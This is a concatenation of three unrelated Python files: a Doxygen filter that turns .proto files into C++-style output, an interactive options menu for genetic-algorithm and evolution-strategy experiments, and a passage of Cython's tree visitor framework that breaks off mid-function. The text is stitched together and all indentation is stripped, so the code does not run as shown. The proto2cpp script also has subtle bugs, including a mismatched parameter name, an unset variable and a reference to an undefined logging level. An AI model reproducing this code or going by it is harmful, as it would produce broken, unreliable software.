# This script converts .proto files into C++ style ones
# and prints the output to standard output.
#
# version 0.6-beta-vg
#
# How to enable this filter in Doxygen:
# 1. Generate Doxygen configuration file with command 'doxygen -g <filename>'
# e.g. doxygen -g doxyfile
# 2. In the Doxygen configuration file, find JAVADOC_AUTOBRIEF and set it enabled
# JAVADOC_AUTOBRIEF = YES
# 3. In the Doxygen configuration file, find FILE_PATTERNS and add *.proto
# FILE_PATTERNS = *.proto
# 4. In the Doxygen configuration file, find EXTENSION_MAPPING and add proto=C
# EXTENSION_MAPPING = proto=C
# 5. In the Doxygen configuration file, find INPUT_FILTER and add this script
# INPUT_FILTER = "python3 proto2cpp.py"
# 6. Run Doxygen with the modified configuration
# doxygen doxyfile
#
#
# Copyright (C) 2016 Regents of the University of California
# Copyright (C) 2012-2015 Timo Marjoniemi
# All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##
import os
import sys
import re
import fnmatch
import inspect
## Class for converting Google Protocol Buffers .proto files into C++ style output to enable Doxygen usage.
##
## The C++ style output is printed into standard output.<br />
## There are three different logging levels for the class:
## <ul><li>#logNone: do not log anything</li>
## <li>#logErrors: log errors only</li>
## <li>#logAll: log everything</li></ul>
## Logging level is determined by \c #logLevel.<br />
## Error logs are written to file determined by \c #errorLogFile.<br />
## Debug logs are written to file determined by \c #logFile.
#
class proto2cpp:
## Logging level: do not log anything.
logNone = 0
## Logging level: log errors only.
logErrors = 1
## Logging level: log everything.
logAll = 2
## Constructor
#
def __init__(self):
## Debug log file name.
self.logFile = "proto2cpp.log"
## Error log file name.
self.errorLogFile = "proto2cpp.error.log"
## Logging level.
self.logLevel = self.logNone
## Handles a file.
##
## If @p fileName has .proto suffix, it is processed through parseFile().
## Otherwise it is printed to stdout as is except for file \c proto2cpp.py without
## path since it's the script given to python for processing.
##
## @param fileName Name of the file to be handled.
#
def handleFile(self, fileName):
if fnmatch.fnmatch(filename, '*.proto'):
self.log('\nXXXXXXXXXX\nXX ' + filename + '\nXXXXXXXXXX\n\n')
# Open the file. Use try to detect whether or not we have an actual file.
try:
with open(filename, 'r') as inputFile:
self.parseFile(inputFile)
pass
except IOError as e:
self.logError('the file ' + filename + ' could not be opened for reading')
elif not fnmatch.fnmatch(filename, os.path.basename(inspect.getfile(inspect.currentframe()))):
self.log('\nXXXXXXXXXX\nXX ' + filename + '\nXXXXXXXXXX\n\n')
try:
with open(filename, 'r') as theFile:
output = ''
for theLine in theFile:
output += theLine
print(output)
self.log(output)
pass
except IOError as e:
self.logError('the file ' + filename + ' could not be opened for reading')
else:
self.log('\nXXXXXXXXXX\nXX ' + filename + ' --skipped--\nXXXXXXXXXX\n\n')
## Parser function.
##
## The function takes a .proto file object as input
## parameter and modifies the contents into C++ style.
## The modified data is printed into standard output.
##
## @param inputFile Input file object
#
def parseFile(self, inputFile):
# Go through the input file line by line.
isEnum = False
inPackage = False
# This variable is here as a workaround for not getting extra line breaks (each line
# ends with a line separator and print() method will add another one).
# We will be adding lines into this var and then print the var out at the end.
theOutput = ''
for line in inputFile:
# Search for comment ("//") and add one more slash character ("/") to the comment
# block to make Doxygen detect it.
matchComment = re.search("//", line)
# Search for semicolon and if one is found before comment, add a third slash character
# ("/") and a smaller than ("<") chracter to the comment to make Doxygen detect it.
matchSemicolon = re.search(";", line)
if matchSemicolon is not None and (matchComment is not None and matchSemicolon.start() < matchComment.start()):
line = line[:matchComment.start()] + "///<" + line[matchComment.end():]
elif matchComment is not None:
line = line[:matchComment.start()] + "///" + line[matchComment.end():]
# Search for "package " and if one is found before comment, make a namespace
matchPackage = re.search(r"\bpackage\b", line)
if matchPackage is not None and (matchComment is None or matchPackage.start() < matchComment.start()):
isPackage = True
# Convert to C++-style separator and block instead of statement
line = "namespace" + line[:matchPackage.start()] + line[matchPackage.end():].replace(".", "::").replace(";", " {")
# Search for "repeated" fields and make them template-y
matchRepeated = re.search(r"\brepeated\b", line)
if matchRepeated is not None and (matchComment is None or matchRepeated.start() < matchComment.start()):
# Convert to a template
line = re.sub(r'repeated\s+(\S+)', r'repeated<\1>', line)
# Search for "enum" and if one is found before comment,
# start changing all semicolons (";") to commas (",").
matchEnum = re.search(r"\benum\b", line)
if matchEnum is not None and (matchComment is None or matchEnum.start() < matchComment.start()):
isEnum = True
# Search again for semicolon if we have detected an enum, and replace semicolon with comma.
if isEnum is True and re.search(";", line) is not None:
matchSemicolon = re.search(";", line)
line = line[:matchSemicolon.start()] + "," + line[matchSemicolon.end():]
# Search for a closing brace.
matchClosingBrace = re.search("}", line)
if isEnum is True and matchClosingBrace is not None:
line = line[:matchClosingBrace.start()] + "};" + line[matchClosingBrace.end():]
isEnum = False
elif isEnum is False and re.search("}", line) is not None:
# Message (to be struct) ends => add semicolon so that it'll
# be a proper C(++) struct and Doxygen will handle it correctly.
line = line[:matchClosingBrace.start()] + "};" + line[matchClosingBrace.end():]
# Search for 'message' and replace it with 'struct' unless 'message' is behind a comment.
matchMsg = re.search(r"\bmessage\b", line)
if matchMsg is not None and (matchComment is None or matchMsg.start() < matchComment.start()):
output = "struct" + line[:matchMsg.start()] + line[matchMsg.end():]
theOutput += output
else:
theOutput += line
if isPackage:
# Close the package namespace
theOutput += "}"
isPackage = False
# Now that we've got all lines in the string let's split the lines and print out
# one by one.
# This is a workaround to get rid of extra empty line at the end which print() method adds.
lines = theOutput.splitlines()
for line in lines:
if len(line) > 0:
print(line)
# Our logger does not add extra line breaks so explicitly adding one to make the log more readable.
self.log(line + '\n')
else:
self.log('\n --- skipped empty line')
## Writes @p string to log file.
##
## #logLevel must be #logAll or otherwise the logging is skipped.
##
## @param string String to be written to log file.
#
def log(self, string):
if self.logLevel >= self.logAll:
with open(self.logFile, 'a') as theFile:
theFile.write(string)
## Writes @p string to error log file.
##
## #logLevel must be #logError or #logAll or otherwise the logging is skipped.
##
## @param string String to be written to error log file.
#
def logError(self, string):
if self.logLevel >= self.logError:
with open(self.errorLogFile, 'a') as theFile:
theFile.write(string)
converter = proto2cpp()
# Doxygen will give us the file names
for filename in sys.argv[1:]:
converter.handleFile(filename)
# end of file
|
|
#!/usr/local/bin/python
# -*-coding:Utf-8 -*
import os
import math
def GA_settings():
"""Provides the view for the user setting of the GA experiments and returns the settings set"""
options = {}
os.system("clear")
print('===== OPTIONS =====\n')
preset = int(raw_input(
"PRESET\n"
"Use preset ?\n"
"\n\n-> 1: Source based preset\n"
"\n-> 2: I WANT TO SET BY MYSELF\n"
))
os.system("clear")
if preset == 1:
options["iterations"] = int(10000)
options["stopFitness"] = float(0.95)
options["mode"] = 'real'
options['crossMode'] = 'randomMultiPoint'
options["maximalPopulation"] = int(50)
options["mutationMode"] = 'oneNucleotid'
options["mutationProbability"] = float(0.05)
options["verbose"] = False
options["initialPopulation"] = int(100)
options['selectionMode'] = 'tournament'
elif preset == 2:
print('BASICS')
x = int(raw_input('Stop Iterations Number:\n'))
options['iterations'] = int(x)
options['stopFitness'] = float(raw_input(
'Stop Fitness:\n'
))
os.system('clear')
print('SELECTION')
options['selectionMode'] = int(raw_input(
'\nSelection Method:\n'
'--> 1: Roulette method\n'
'--> 2: Tournament method\n'
'--> 3: Roulette without replacement method\n'
))
if options['selectionMode'] == 1:
options['selectionMode'] = 'roulette'
elif options['selectionMode'] == 2:
options['selectionMode'] = 'tournament'
elif options['selectionMode'] == 3:
options['selectionMode'] = 'rouletteWR'
os.system('clear')
print('CROSSOVER & MUTATIONS')
options['mode'] = int(raw_input(
'Mode:\n'
'-> 1: Binary mode\n'
'-> 2: Real mode\n'
))
if options['mode'] == 1:
options['mode'] = 'binary'
elif options['mode'] == 2:
options['mode'] = 'real'
options['crossMode'] = int(raw_input(
'Crossover Mode:\n'
'--> 1: random one point\n'
'--> 2: random multipoint\n'
))
if options['crossMode'] == 1:
options['crossMode'] = 'randomOnePoint'
elif options['crossMode'] == 2:
options['crossMode'] = 'randomMultiPoint'
options['mutationMode'] = int(raw_input(
'Mutation Mode:\n'
'-> 0: Swap mode\n'
'-> 1: Each nucleotid has a chance to be muted, one by one\n'
'-> 2: 1 mutation maximum by child\n'
))
if options['mutationMode'] == 0:
options['mutationMode'] = 'swap'
elif options['mutationMode'] == 1:
options['mutationMode'] = 'everyNucleotid'
elif options['mutationMode'] == 2:
options['mutationMode'] = 'oneNucleotid'
options['mutationProbability'] = float(raw_input(
'Mutation Probability Mode:\n'
'-> 0 < n < 1: Fixed Probability\n'
'-> 2: Random Probability, basically between 1/BitArraySize and 1/PopulationSize\n'
))
os.system('clear')
print("POPULATION")
options["maximalPopulation"] = int(raw_input(
"Maximal Population:\n"
"-> n > 0: elitist insertion, just keep n best individuals\n"
"-> Other: every individual is kept (can slow down the algorythm for several iterations)\n"
"-> WARNING: If you set maximal population = 1 WITH roulette without replacement"
", your computer will explode\n"
))
options["initialPopulation"] = int(raw_input("Initialise with how much individuals ?\n"))
os.system("clear")
print("\nVERBOSE")
options["verbose"] = int(raw_input(
"Verbose Mode\n"
"-> 1: Enabled\n"
"-> 0: Disabled\n"
))
if options['verbose'] == 0:
options['verbose'] = False
elif options['verbose'] == 1:
options['verbose'] = True
os.system("clear")
return options
def ES_settings():
"""Provides the view for the user setting of the ES experiments and returns the settings set"""
os.system("clear")
print('===== OPTIONS =====\n')
options = {}
preset = int(raw_input(
"PRESET\n"
"Use preset ?\n"
"\n\n-> 1: Source based preset\n"
"\n-> 2: I WANT TO SET BY MYSELF\n"
))
os.system("clear")
if preset == 1:
options["iterations"] = int(1000)
options["stopFitness"] = float(0.95)
options["base"] = int(10)
options['verbose'] = False
options['selectionMode'] = int(1)
options['mutationMode'] = '2LRNS'
options['recombinationMode'] = 'weighted'
options['sigmaBoost'] = True
elif preset == 2:
print('\nBASICS')
x = int(raw_input('Stop Iterations Number:\n'))
options["iterations"] = int(x)
options['stopFitness'] = float(raw_input('\nStop Fitness:\n'))
print("\nGENERATIONS")
options["base"] = int(raw_input(
'n setting:\n'
'lambda (number of child from the father) = 8 * n\n'
'mu (number of best child selected to make new father) = lambda / 4\n'
't (global step size) = 1 / (n)^(1/2)\n'
'ti (component step size) = 1 / (n)^(1/4)\n'
))
print('RECOMBINATION')
options['recombinationMode'] = int(raw_input(
'Recombination mode:\n'
'1- Intermediate\n'
'2- Select Best\n'
'3- Weighted\n'
))
if options['recombinationMode'] == 1:
options['recombinationMode'] = 'intermediate'
elif options['recombinationMode'] == 2:
options['recombinationMode'] = 'best'
elif options['recombinationMode'] == 3:
options['recombinationMode'] = 'weighted'
print('MUTATION')
options['mutationMode'] = int(raw_input(
'Mutation mode:\n'
'1- 2 Learning Rates, N Sigmas\n'
'2- 1 Learning Rate, 1 Sigma\n'
))
if options['mutationMode'] == 1:
options['mutationMode'] = '2LRNS'
elif options['mutationMode'] == 2:
options['mutationMode'] = '1LR1S'
print('SIGMA BOOST')
options['sigmaBoost'] = int(raw_input(
'Allow sigma boost YOLO special feature ?\n'
'1- sigma nitro enabled\n'
'2- sigma nitro disabled\n'
))
if options['sigmaBoost'] == 1:
options['sigmaBoost'] = True
elif options['sigmaBoost'] == 2:
options['sigmaBoost'] = False
print("\nVERBOSE")
options["verbose"] = int(raw_input(
"Verbose Mode\n"
"-> 1: Enabled\n"
"-> 0: Disabled\n"
))
os.system("clear")
options['maximalPopulation'] = 2 * options['base']
options['childNumber'] = 8 * options['base']
options['globalLearningRate'] = 1.0 / pow(options['base'], 0.5)
options['localLearningRate'] = 1.0 / pow(options['base'], 0.25)
return options
|
|
# cython: infer_types=True
#
# Tree visitor and transform framework
#
from __future__ import absolute_import, print_function
import sys
import inspect
from . import TypeSlots
from . import Builtin
from . import Nodes
from . import ExprNodes
from . import Errors
from . import DebugFlags
from . import Future
import cython
cython.declare(_PRINTABLE=tuple)
if sys.version_info[0] >= 3:
_PRINTABLE = (bytes, str, int, float)
else:
_PRINTABLE = (str, unicode, long, int, float)
class TreeVisitor(object):
"""
Base class for writing visitors for a Cython tree, contains utilities for
recursing such trees using visitors. Each node is
expected to have a child_attrs iterable containing the names of attributes
containing child nodes or lists of child nodes. Lists are not considered
part of the tree structure (i.e. contained nodes are considered direct
children of the parent node).
visit_children visits each of the children of a given node (see the visit_children
documentation). When recursing the tree using visit_children, an attribute
access_path is maintained which gives information about the current location
in the tree as a stack of tuples: (parent_node, attrname, index), representing
the node, attribute and optional list index that was taken in each step in the path to
the current node.
Example:
>>> class SampleNode(object):
... child_attrs = ["head", "body"]
... def __init__(self, value, head=None, body=None):
... self.value = value
... self.head = head
... self.body = body
... def __repr__(self): return "SampleNode(%s)" % self.value
...
>>> tree = SampleNode(0, SampleNode(1), [SampleNode(2), SampleNode(3)])
>>> class MyVisitor(TreeVisitor):
... def visit_SampleNode(self, node):
... print("in %s %s" % (node.value, self.access_path))
... self.visitchildren(node)
... print("out %s" % node.value)
...
>>> MyVisitor().visit(tree)
in 0 []
in 1 [(SampleNode(0), 'head', None)]
out 1
in 2 [(SampleNode(0), 'body', 0)]
out 2
in 3 [(SampleNode(0), 'body', 1)]
out 3
out 0
"""
def __init__(self):
super(TreeVisitor, self).__init__()
self.dispatch_table = {}
self.access_path = []
def dump_node(self, node, indent=0):
ignored = list(node.child_attrs or []) + [u'child_attrs', u'pos',
u'gil_message', u'cpp_message',
u'subexprs']
values = []
pos = getattr(node, 'pos', None)
if pos:
source = pos[0]
if source:
import os.path
source = os.path.basename(source.get_description())
values.append(u'%s:%s:%s' % (source, pos[1], pos[2]))
attribute_names = dir(node)
attribute_names.sort()
for attr in attribute_names:
if attr in ignored:
continue
if attr.startswith(u'_') or attr.endswith(u'_'):
continue
try:
value = getattr(node, attr)
except AttributeError:
continue
if value is None or value == 0:
continue
elif isinstance(value, list):
value = u'[...]/%d' % len(value)
elif not isinstance(value, _PRINTABLE):
continue
else:
value = repr(value)
values.append(u'%s = %s' % (attr, value))
return u'%s(%s)' % (node.__class__.__name__,
u',\n '.join(values))
def _find_node_path(self, stacktrace):
import os.path
last_traceback = stacktrace
nodes = []
while hasattr(stacktrace, 'tb_frame'):
frame = stacktrace.tb_frame
node = frame.f_locals.get(u'self')
if isinstance(node, Nodes.Node):
code = frame.f_code
method_name = code.co_name
pos = (os.path.basename(code.co_filename),
frame.f_lineno)
nodes.append((node, method_name, pos))
last_traceback = stacktrace
stacktrace = stacktrace.tb_next
return (last_traceback, nodes)
def _raise_compiler_error(self, child, e):
import sys
trace = ['']
for parent, attribute, index in self.access_path:
node = getattr(parent, attribute)
if index is None:
index = ''
else:
node = node[index]
index = u'[%d]' % index
trace.append(u'%s.%s%s = %s' % (
parent.__class__.__name__, attribute, index,
self.dump_node(node)))
stacktrace, called_nodes = self._find_node_path(sys.exc_info()[2])
last_node = child
for node, method_name, pos in called_nodes:
last_node = node
trace.append(u"File '%s', line %d, in %s: %s" % (
pos[0], pos[1], method_name, self.dump_node(node)))
raise Errors.CompilerCrash(
getattr(last_node, 'pos', None), self.__class__.__name__,
u'\n'.join(trace), e, stacktrace)
@cython.final
def find_handler(self, obj):
# to resolve, try entire hierarchy
cls = type(obj)
pattern = "visit_%s"
mro = inspect.getmro(cls)
handler_method = None
for mro_cls in mro:
handler_method = getattr(self, pattern % mro_cls.__name__, None)
if handler_method is not None:
return handler_method
print(type(self), cls)
if self.access_path:
print(self.access_path)
print(self.access_path[-1][0].pos)
print(self.access_path[-1][0].__dict__)
raise RuntimeError("Visitor %r does not accept object: %s" % (self, obj))
def visit(self, obj):
return self._visit(obj)
@cython.final
def _visit(self, obj):
try:
try:
handler_method = self.dispatch_table[type(obj)]
except KeyError:
handler_method = self.find_handler(obj)
self.dispatch_table[type(obj)] = handler_method
return handler_method(obj)
except Errors.CompileError:
raise
except Errors.AbortError:
raise
except Exception as e:
if DebugFlags.debug_no_exception_intercept:
raise
self._raise_compiler_error(obj, e)
@cython.final
def _visitchild(self, child, parent, attrname, idx):
self.access_path.append((parent, attrname, idx))
result = self._visit(child)
self.access_path.pop()
return result
def visitchildren(self, parent, attrs=None):
return self._visitchildren(parent, attrs)
@cython.final
@cython.locals(idx=int)
def _visitchildren(self, parent, attrs):
"""
Visits the children of the given parent. If parent is None, returns
immediately (returning None).
The return value is a dictionary giving the results for each
child (mapping the attribute name to either the return value
or a list of return values (in the case of multiple children
in an attribute)).
"""
if parent is None: return None
result = {}
for attr in parent.child_attrs:
if attrs is not None and attr not in attrs: continue
child = getattr(parent, attr)
if child is not None:
if type(child) is list:
childretval = [self._visitchild(x, parent, attr, idx) for idx, x in enumerate(child)]
else:
childretval = self._visitchild(child, parent, attr, None)
assert not isinstance(childretval, list), 'Cannot insert list here: %s in %r' % (attr, parent)
result[attr] = childretval
return result
class VisitorTransform(TreeVisitor):
"""
A tree transform is a base class for visitors that wants to do stream
processing of the structure (rather than attributes etc.) of a tree.
It implements __call__ to simply visit the argument node.
It requires the visitor methods to return the nodes which should take
the place of the visited node in the result tree (which can be the same
or one or more replacement). Specifically, if the return value from
a visitor method is:
- [] or None; the visited node will be removed (set to None if an attribute and
removed if in a list)
- A single node; the visited node will be replaced by the returned node.
- A list of nodes; the visited nodes will be replaced by all the nodes in the
list. This will only work if the node was already a member of a list; if it
was not, an exception will be raised. (Typically you want to ensure that you
are within a StatListNode or similar before doing this.)
"""
def visitchildren(self, parent, attrs=None):
result = self._visitchildren(parent, attrs)
for attr, newnode in result.items():
if type(newnode) is not list:
setattr(parent, attr, newnode)
else:
# Flatten the list one level and remove any None
newlist = []
for x in newnode:
if x is not None:
if type(x) is list:
newlist += x
else:
newlist.append(x)
setattr(parent, attr, newlist)
return result
def recurse_to_children(self, node):
self.visitchildren(node)
return node
def __call__(self, root):
return self._visit(root)
class CythonTransform(VisitorTransform):
"""
Certain common conventions and utilities for Cython transforms.
- Sets up the context of the pipeline in self.context
- Tracks directives in effect in self.current_directives
"""
def __init__(self, context):
super(CythonTransform, self).__init__()
self.context = context
def __call__(self, node):
from . import ModuleNode
if isinstance(node, ModuleNode.ModuleNode):
self.current_directives = node.directives
return super(CythonTransform, self).__call__(node)
def visit_CompilerDirectivesNode(self, node):
old = self.current_directives
self.current_directives = node.directives
self.visitchildren(node)
self.current_directives = old
return node
def visit_Node(self, node):
self.visitchildren(node)
return node
class ScopeTrackingTransform(CythonTransform):
# Keeps track of type of scopes
#scope_type: can be either of 'module', 'function', 'cclass', 'pyclass', 'struct'
#scope_node: the node that owns the current scope
def visit_ModuleNode(self, node):
self.scope_type = 'module'
self.scope_node = node
self.visitchildren(node)
return node
def visit_scope(self, node, scope_type):
prev = self.scope_type, self.scope_node
self.scope_type = scope_type
self.scope_node = node
self.visitchildren(node)
self.scope_type, self.scope_node = prev
return node
def visit_CClassDefNode(self, node):
return self.visit_scope(node, 'cclass')
def visit_PyClassDefNode(self, node):
return self.visit_scope(node, 'pyclass')
def visit_FuncDefNode(self, node):
return self.visit_scope(node, 'function')
def visit_CStructOrUnionDefNode(self, node):
return self.visit_scope(node, 'struct')
class EnvTransform(CythonTransform):
"""
This transformation keeps a stack of the environments.
"""
def __call__(self, root):
self.env_stack = []
self.enter_scope(root, root.scope)
return super(EnvTransform, self).__call__(root)
def current_env(self):
return self.env_stack[-1][1]
def current_scope_node(self):
return self.env_stack[-1][0]
def global_scope(self):
return self.current_env().global_scope()
def enter_scope(self, node, scope):
self.env_stack.append((node, scope))
def exit_scope(self):
self.env_stack.pop()
def visit_FuncDefNode(self, node):
self.enter_scope(node, node.local_scope)
self.visitchildren(node)
self.exit_scope()
return node
def visit_GeneratorBodyDefNode(self, node):
self.visitchildren(node)
return node
def visit_ClassDefNode(self, node):
self.enter_scope(node, node.scope)
self.visitchildren(node)
self.exit_scope()
return node
def visit_CStructOrUnionDefNode(self, node):
self.enter_scope(node, node.scope)
self.visitchildren(node)
self.exit_scope()
return node
def visit_ScopedExprNode(self, node):
if node.expr_scope:
self.enter_scope(node, node.expr_scope)
self.visitchildren(node)
self.exit_scope()
else:
self.visitchildren(node)
return node
def visit_CArgDeclNode(self, node):
# default arguments are evaluated in the outer scope
if node.default:
attrs = [ attr for attr in node.child_attrs if attr != 'default' ]
self.visitchildren(node, attrs)
self.enter_scope(node, self.current_env().outer_scope)
self.visitchildren(node, ('default',))
self.exit_scope()
else:
self.visitchildren(node)
return node
class NodeRefCleanupMixin(object):
"""
Clean up references to nodes that were replaced.
NOTE: this implementation assumes that the replacement is
done first, before hitting any further references during
normal tree traversal. This needs to be arranged by calling
"self.visitchildren()" at a proper place in the transform
and by ordering the "child_attrs" of nodes appropriately.
"""
def __init__(self, *args):
super(NodeRefCleanupMixin, self).__init__(*args)
self._replacements = {}
def visit_CloneNode(self, node):
arg = node.arg
if arg not in self._replacements:
self.visitchildren(arg)
node.arg = self._replacements.get(arg, arg)
return node
def visit_ResultRefNode(self, node):
expr = node.expression
if expr is None or expr not in self._replacements:
self.visitchildren(node)
expr = node.expression
if expr is not None:
node.expression = self._replacements.get(expr, expr)
return node
def replace(self, node, replacement):
self._replacements[node] = replacement
return replacement
find_special_method_for_binary_operator = {
'<': '__lt__',
'<=': '__le__',
'==': '__eq__',
'!=': '__ne__',
'>=': '__ge__',
'>': '__gt__',
'+': '__add__',
'&': '__and__',
'/': '__div__',
'//': '__floordiv__',
'<<': '__lshift__',
'%': '__mod__',
'*': '__mul__',
'|': '__or__',
'**': '__pow__',
'>>': '__rshift__',
'-': '__sub__',
'^': '__xor__',
'in': '__contains__',
}.get
find_special_method_for_unary_operator = {
'not': '__not__',
'~': '__inv__',
'-': '__neg__',
'+': '__pos__',
}.get
class MethodDispatcherTransform(EnvTransform):
"""
Base class for transformations that want to intercept on specific
builtin functions or methods of builtin types, including special
methods triggered by Python operators. Must run after declaration
analysis when entries were assigned.
Naming pattern for handler methods is as follows:
* builtin functions: _handle_(general|simple|any)_function_NAME
* builtin methods: _handle_(general|simple|any)_method_TYPENAME_METHODNAME
"""
# only visit call nodes and Python operations
def visit_GeneralCallNode(self, node):
self.visitchildren(node)
function = node.function
if not function.type.is_pyobject:
return node
arg_tuple = node.positional_args
if not isinstance(arg_tuple, ExprNodes.TupleNode):
return node
keyword_args = node.keyword_args
if keyword_args and not isinstance(keyword_args, ExprNodes.DictNode):
# can't handle **kwargs
return node
args = arg_tuple.args
return self._dispatch_to_handler(node, function, args, keyword_args)
def visit_SimpleCallNode(self, node):
self.visitchildren(node)
function = node.function
if function.type.is_pyobject:
arg_tuple = node.arg_tuple
if not isinstance(arg_tuple, ExprNodes.TupleNode):
return node
args = arg_tuple.args
else:
args = node.args
return self._dispatch_to_handler(node, function, args, None)
def visit_PrimaryCmpNode(self, node):
if node.cascade:
# not currently handled below
self.visitchildren(node)
return node
return self._visit_binop_node(node)
def visit_BinopNode(self, node):
return self._visit_binop_node(node)
def _visit_binop_node(self, node):
self.visitchildren(node)
# FIXME: could special case 'not_in'
special_method_name = find_special_method_for_binary_operator(node.operator)
if special_method_name:
operand1, operand2 = node.operand1, node.operand2
if special_method_name == '__contains__':
operand1, operand2 = operand2, operand1
elif special_method_name == '__div__':
if Future.division in self.current_env().global_scope().context.future_directives:
special_method_name = '__truediv__'
obj_type = operand1.type
if obj_type.is_builtin_type:
type_name = obj_type.name
else:
type_name = "object" # safety measure
node = self._dispatch_to_method_handler(
special_method_name, None, False, type_name,
node, None, [operand1, operand2], None)
return node
def visit_UnopNode(self, node):
self.visitchildren(node)
special_method_name = find_special_method_for_unary_operator(node.operator)
if special_method_name:
operand = node.operand
obj_type = operand.type
if obj_type.is_builtin_type:
type_name = obj_type.name
else:
type_name = "object" # safety measure
node = self._dispatch_to_method_handler(
special_method_name, None, False, type_name,
node, None, [operand], None)
return node
### dispatch to specific handlers
def _find_handler(self, match_name, has_kwargs):
call_type = has_kwargs and 'general' or 'simple'
handler = getattr(self, '_handle_%s_%s' % (call_type, match_name), None)
if handler is None:
handler = getattr(self, '_handle_any_%s' % match_name, None)
return handler
def _delegate_to_assigned_value(self, node, function, arg_list, kwargs):
assignment = function.cf_state[0]
value = assignment.rhs
if value.is_name:
if not value.entry or len(value.entry.cf_assignments) > 1:
# the variable might have been reassigned => play safe
return node
elif value.is_attribute and value.obj.is_name:
if not value.obj.entry or len(value.obj.entry.cf_assignments) > 1:
# the underlying variable might have been reassigned => play safe
return node
else:
return node
return self._dispatch_to_handler(
node, value, arg_list, kwargs)
def _dispatch_to_handler(self, node, function, arg_list, kwargs):
if function.is_name:
# we only consider functions that are either builtin
# Python functions or builtins that were already replaced
# into a C function call (defined in the builtin scope)
if not function.entry:
return node
is_builtin = (
function.entry.is_builtin or
function.entry is self.current_env().builtin_scope().lookup_here(function.name))
if not is_builtin:
if function.cf_state and function.cf_state.is_single:
# we know the value of the variable
# => see if it's usable instead
return self._delegate_to_assigned_value(
node, function, arg_list, kwargs)
return node
function_handler = self._find_handler(
"function_%s" % function.name, kwargs)
if function_handler is None:
return self._handle_function(node, function.name, function, arg_list, kwargs)
if kwargs:
return function_handler(node, function, arg_list, kwargs)
else:
return function_handler(node, function, arg_list)
elif function.is_attribute:
attr_name = function.attribute
if function.type.is_pyobject:
self_arg = function.obj
elif node.self and function.entry:
entry = function.entry.as_variable
if not entry or not entry.is_builtin:
return node
# C implementation of a Python builtin method - see if we find further matches
self_arg = node.self
arg_list = arg_list[1:] # drop CloneNode of self argument
else:
return node
obj_type = self_arg.type
is_unbound_method = False
if obj_type.is_builtin_type:
if (obj_type is Builtin.type_type and self_arg.is_name and
arg_list and arg_list[0].type.is_pyobject):
# calling an unbound method like 'list.append(L,x)'
# (ignoring 'type.mro()' here ...)
type_name = self_arg.name
self_arg = None
is_unbound_method = True
else:
type_name = obj_type.name
else:
type_name = "object" # safety measure
return self._dispatch_to_method_handler(
attr_name, self_arg, is_unbound_method, type_name,
node, function, arg_list, kwargs)
else:
return node
def _dispatch_to_method_handler(self, attr_name, self_arg,
is_unbound_method, type_name,
node, function, arg_list, kwargs):
method_handler = self._find_handler(
"method_%s_%s" % (type_name, attr_name), kwargs)
if method_handler is None:
if (attr_name in TypeSlots.method_name_to_slot
or attr_name == '__new__'):
method_handler = self._find_handler(
"slot%s" % attr_name, kwargs)
if method_handler is None:
return self._handle_method(
node, type_name, attr_name, function,
arg_list, is_unbound_method, kwargs)
if self_arg is not None:
arg_list = [self_arg] + list(arg_list)
if kwargs:
result = method_handler(
node, function, arg_list, is_unbound_method, kwargs)
else:
result = method_handler(
node, function, arg_list, is_unbound_method)
return result
def _handle_function(self, node, function_name, function, arg_list, kwargs):
"""Fallback handler"""
return node
def _handle_method(self, node, type_name, attr_name, function,
arg_list, is_unbound_method, kwargs):
"""Fallback handler"""
return node
class RecursiveNodeReplacer(VisitorTransform):
"""
Recursively replace all occurrences of a node in a subtree by
another node.
"""
def __init__(self, orig_node, new_node):
super(RecursiveNodeReplacer, self).__init__()
self.orig_node, self.new_node = orig_node, new_node
def visit_CloneNode(self, node):
if node is self.orig_node:
return self.new_node
if node.arg is self.orig_node:
node.arg = self.new_node
return node
def visit_Node(self, node):
self.visitchildren(node)
if node is self.orig_node:
return self.new_node
else:
return node
def recursively_replace_node(tree, old_node, new_node):
replace_in = RecursiveNodeReplacer(old_node, new_node)
replace_in(tree)
class NodeFinder(TreeVisitor):
"""
Find out if a node appears in a subtree.
"""
def __init__(self, node):
super(NodeFinder, self).__init__()
self.node = node
self.found = False
def visit_Node(self, node):
if self.found:
pass # short-circuit
elif node is self.node:
self.found = True
else:
self._visitchildren(node, None)
def tree_contains(tree, node):
finder = NodeFinder(node)
finder.visit(tree)
return finder.found
# Utils
def replace_node(ptr, value):
"""Replaces a node. ptr is of the form used on the access path stack
(parent, attrname, listidx|None)
"""
parent, attrname, listidx = ptr
if listidx is None:
setattr(parent, attrname, value)
else:
getattr(parent, attrname)[listidx] = value
class PrintTree(TreeVisitor):
"""Prints a representation of the tree to standard output.
Subclass and override repr_of to provide more information
about nodes. """
def __init__(self, start=None, end=None):
TreeVisitor.__init__(self)
self._indent = ""
if start is not None or end is not None:
self._line_range = (start or 0, end or 2**30)
else:
self._line_range = None
def indent(self):
self._indent += " "
def unindent(self):
self._indent = self._indent[:-2]
def __call__(self, tree, phase=None):
print("Parse tree dump at phase '%s'" % phase)
self.visit(tree)
return tree
# Don't do anything about process_list, the defaults gives
# nice-looking name[idx] nodes which will visually appear
# under the parent-node, not displaying the list itself in
# the hierarchy.
def visit_Node(self, node):
self._print_node(node)
self.indent()
self.visitchildren(node)
self.unindent()
return node
def visit_CloneNode(self, node):
self._print_node(node)
self.indent()
line = node.pos[1]
if self._line_range is None or self._line_range[0] <= line <= self._line_range[1]:
print("%s- %s: %s" % (self._indent, 'arg', self.repr_of(node.arg)))
self.indent()
self.visitchildren(node.arg)
self.unindent()
self.unindent()
return node
def _print_node(self, node):
line = node.pos[1]
if self._line_range is None or self._line_range[0] <= line <= self._line_range[1]:
if len(self.access_path) == 0:
name = "(root)"
else:
parent, attr, idx = self.access_path[-1]
if idx is not None:
name = "%s[%d]" % (attr, idx)
else:
name = attr
print("%s- %s: %s" % (self._indent, name, self.repr_of(node)))
def repr_of(self, node):
if node is None:
return "(none)"
else:
result = node.__class__.__name__
if isinstance(node, ExprNodes.NameNode):
result += "(type=%s, name=\"%s\")" % (repr(node.type), node.name)
elif isinstance(node, Nodes.DefNode):
result += "(name=\"%s\")" % node.name
